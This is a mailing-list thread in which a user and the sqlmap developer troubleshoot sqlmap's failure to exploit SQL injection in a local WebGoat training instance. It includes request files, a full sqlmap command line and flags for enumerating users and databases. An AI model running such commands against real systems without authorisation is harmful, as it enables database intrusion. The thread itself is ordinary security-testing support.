Hi. There has been a lot work here. Please update to the latest revision and retry it again.
One word of advice regarding WebGoat. It has a bad routine that automatically closes the SQLi after it finds certain keywords in requests. Basically, afterwards it just says "* Congratulations. You have successfully completed this lesson." and prevents further injection. Hence, you'll need to use --safe-url and --safe-freq to reset those. Please find details further in pastebin links. Here you can find couple of different runs: --technique=B http://pastebin.com/04z2x00S (no technique constraints) http://pastebin.com/UhGQLyTp Bye On Tue, Oct 13, 2015 at 10:18 AM, Miroslav Stampar < miroslav.stam...@gmail.com> wrote: > Hi. > > There is still more work here to be done. Will let you know. I am going to > try to finish it today. > > Bye > > On Tue, Oct 13, 2015 at 10:13 AM, Vojtěch Polášek <krec...@gmail.com> > wrote: > >> Greetings, >> I have still problems exploiting HSQL databases. current-user is still >> returning garbled characters etc. >> Is it still working for you? >> Thanks, >> Vojta >> >> Dne 10.10.2015 v 01:35 Miroslav Stampar napsal(a): >> >> I've used that same request file without any problems (with latest >> patches/revision). Will retest tomorrow. Please retry everything with >> --flush-session >> >> Bye >> On Oct 10, 2015 1:17 AM, "Vojtěch Polášek" <krec...@gmail.com> wrote: >> >>> Greetings, >>> thanks for your prompt response. >>> Unfortunatelly, it is still not working as expected. >>> There is problem with retrieving of current user and information from >>> HSQL database in general. >>> Moreover, when using following request file from the same application, >>> Sqlmap identified backend database as Postgresql instead of HSQL. >>> This request is from lesson about simple string SQL injection >>> #begin request file >>> POST /WebGoat/attack?Screen=36&menu=1100 HTTP/1.1 >>> Host: localhost:8080 >>> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 >>> Firefox/39.0 >>> Accept: */* >>> Accept-Language: cs,en-US;q=0.7,en;q=0.3 >>> Accept-Encoding: gzip, deflate >>> Content-Type: application/x-www-form-urlencoded; charset=UTF-8 >>> X-Requested-With: XMLHttpRequest >>> Referer: http://localhost:8080/WebGoat/start.mvc >>> Content-Length: 29 >>> Connection: keep-alive >>> Pragma: no-cache >>> Cache-Control: no-cache >>> Cookie: JSESSIONID=valid_cookie >>> >>> account_name=Smith&SUBMIT=Go! >>> #end request >>> Feel free to ask me for more debugging information, I will be glad to >>> help you. >>> Thanks for your work, >>> Vojta >>> Dne 9.10.2015 v 16:52 Miroslav Stampar napsal(a): >>> >>> Fixed tons of bugs and pushed. Please retry it again. >>> >>> Bye >>> >>> On Fri, Oct 9, 2015 at 3:55 PM, Miroslav Stampar < >>> <miroslav.stam...@gmail.com>miroslav.stam...@gmail.com> wrote: >>> >>>> Please wait a bit. There are tons of bugs for HSQLDB in sqlmap. On it >>>> right now. >>>> >>>> Bye >>>> >>>> On Fri, Oct 9, 2015 at 2:20 PM, Miroslav Stampar < >>>> miroslav.stam...@gmail.com> wrote: >>>> >>>>> Hi again. >>>>> >>>>> Please update to the latest revision and retry it again (with >>>>> --flush-session). >>>>> >>>>> Backend used is HSQLDB while the sqlmap wrongly recognized it as MySQL >>>>> (because HSQLDB is MySQL look-alike) >>>>> >>>>> Bye >>>>> >>>>> On Fri, Oct 9, 2015 at 12:49 PM, Vojtěch Polášek < <krec...@gmail.com> >>>>> krec...@gmail.com> wrote: >>>>> >>>>>> Hi, >>>>>> You can download Webgoat here: >>>>>> >>>>>> https://webgoat.atlassian.net/builds/browse/WEB-WGM/latestSuccessful/artifact/shared/WebGoat-Embedded-Tomcat/WebGoat-6.0.1-war-exec.jar >>>>>> Just run java- jar WebGoat-6.0.1-war-exec.jar >>>>>> And you can login at localhost:8080/WebGoat with name webgoat and >>>>>> password webgoat >>>>>> The request file posted earlier is from Blind numeric SQL injection >>>>>> lesson. >>>>>> Application is written in Java and runs on embedded Tomcat 7 server. >>>>>> I am using this command, where "request" is request file posted >>>>>> earlier and valid_cookie is simply valid cookie. >>>>>> python2 /opt/sqlmap/sqlmap.py -r request --level=5 --risk=3 -o >>>>>> --cookie="JSESSIONID=valid_cookie' -v3 >>>>>> As I stated earlier, sqlmap finds the vulnerability but can't exploit >>>>>> it, I tried almost all tamper scripts, even some combinations, but no >>>>>> success. >>>>>> I wanted to show exploitation of Webgoat, because I would like to use >>>>>> Sqlmap for testing of commercial application which is based on similar >>>>>> technologies. >>>>>> Thank you, >>>>>> Vojta >>>>>> >>>>>> >>>>>> Dne 9.10.2015 v 11:16 Miroslav Stampar napsal(a): >>>>>> >>>>>> Hi. >>>>>> >>>>>> Can you please send a used sqlmap command along with the basic info >>>>>> on vulnerable environment (e.g. just a plain Webgoat, URL this and that)? >>>>>> >>>>>> Bye >>>>>> >>>>>> On Thu, Oct 8, 2015 at 10:52 PM, Vojtěch Polášek < >>>>>> <krec...@gmail.com>krec...@gmail.com> wrote: >>>>>> >>>>>>> Greetings, >>>>>>> I am running Webgoat from standalone jar file, so I can't see any >>>>>>> logs. >>>>>>> I will try to see some logs from inside the application. Anyway, I >>>>>>> didn't expect this application to contain any kind of filtering. >>>>>>> I hope to show Sqlmap in action to some people from a large company >>>>>>> and >>>>>>> I wanted to use something simple, therefore I am quite surprised. I >>>>>>> have >>>>>>> never seen this situation - found injection but no possibility of >>>>>>> exploitation. >>>>>>> The between tamper script didn't help. >>>>>>> Any suggestions are welcomed. >>>>>>> Thanks, >>>>>>> Vojta >>>>>>> >>>>>>> Dne 8.10.2015 v 18:10 Brandon Perry napsal(a): >>>>>>> > You should look in the logs of the web server and see what they >>>>>>> say. >>>>>>> > >>>>>>> > I bet you need --tamper=between >>>>>>> > >>>>>>> > Sent from a phone >>>>>>> > >>>>>>> >> On Oct 8, 2015, at 10:33 AM, Vojtěch Polášek < >>>>>>> <krec...@gmail.com>krec...@gmail.com> wrote: >>>>>>> >> >>>>>>> >> Greetings, >>>>>>> >> I tried to verify Sqlmap's functionality by running it against >>>>>>> Webgoat >>>>>>> >> version 6.0.1. You can try it your self by using following >>>>>>> request file. >>>>>>> >> Just log in and replace cookie by valid one. >>>>>>> >> ###start request file >>>>>>> >> POST /WebGoat/attack?Screen=4&menu=1100 HTTP/1.1 >>>>>>> >> Host: localhost:8080 >>>>>>> >> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:41.0) >>>>>>> Gecko/20100101 >>>>>>> >> Firefox/41.0 >>>>>>> >> Accept: */* >>>>>>> >> Accept-Language: cs,en-US;q=0.7,en;q=0.3 >>>>>>> >> Accept-Encoding: gzip, deflate >>>>>>> >> Content-Type: application/x-www-form-urlencoded; charset=UTF-8 >>>>>>> >> X-Requested-With: XMLHttpRequest >>>>>>> >> Referer: <http://localhost:8080/WebGoat/start.mvc> >>>>>>> http://localhost:8080/WebGoat/start.mvc >>>>>>> >> Content-Length: 29 >>>>>>> >> Cookie: JSESSIONID=replace >>>>>>> >> Connection: keep-alive >>>>>>> >> Pragma: no-cache >>>>>>> >> Cache-Control: no-cache >>>>>>> >> >>>>>>> >> account_number=101&SUBMIT=Go! >>>>>>> >> #end request file >>>>>>> >> I am running git master of Sqlmap. >>>>>>> >> Sqlmap detects SQL injection (boolean based blind Mysql), but no >>>>>>> >> information gathering commands work (--dbs, --current-user...). I >>>>>>> tried >>>>>>> >> running with --hex or --no-cast, but no luck. >>>>>>> >> What might be the problem? >>>>>>> >> Thanks, >>>>>>> >> Vojta >>>>>>> >> >>>>>>> >> >>>>>>> ------------------------------------------------------------------------------ >>>>>>> >> _______________________________________________ >>>>>>> >> sqlmap-users mailing list >>>>>>> >> <sqlmap-users@lists.sourceforge.net> >>>>>>> sqlmap-users@lists.sourceforge.net >>>>>>> >> <https://lists.sourceforge.net/lists/listinfo/sqlmap-users> >>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>>>> >>>>>>> >>>>>>> >>>>>>> ------------------------------------------------------------------------------ >>>>>>> _______________________________________________ >>>>>>> sqlmap-users mailing list >>>>>>> <sqlmap-users@lists.sourceforge.net> >>>>>>> sqlmap-users@lists.sourceforge.net >>>>>>> <https://lists.sourceforge.net/lists/listinfo/sqlmap-users> >>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>>>> >>>>>> >>>>>> >>>>>> >>>>>> -- >>>>>> Miroslav Stampar >>>>>> <http://about.me/stamparm>http://about.me/stamparm >>>>>> >>>>>> >>>>>> >>>>>> >>>>>> ------------------------------------------------------------------------------ >>>>>> >>>>>> _______________________________________________ >>>>>> sqlmap-users mailing list >>>>>> sqlmap-users@lists.sourceforge.net >>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>>> >>>>>> >>>>> >>>>> >>>>> -- >>>>> Miroslav Stampar >>>>> http://about.me/stamparm >>>>> >>>> >>>> >>>> >>>> -- >>>> Miroslav Stampar >>>> http://about.me/stamparm >>>> >>> >>> >>> >>> -- >>> Miroslav Stampar >>> http://about.me/stamparm >>> >>> >>> >>> >>> ------------------------------------------------------------------------------ >>> >>> _______________________________________________ >>> sqlmap-users mailing list >>> sqlmap-users@lists.sourceforge.net >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> >> >> ------------------------------------------------------------------------------ >> >> _______________________________________________ >> sqlmap-users mailing list >> sqlmap-users@lists.sourceforge.net >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > -- Miroslav Stampar http://about.me/stamparm
------------------------------------------------------------------------------
_______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
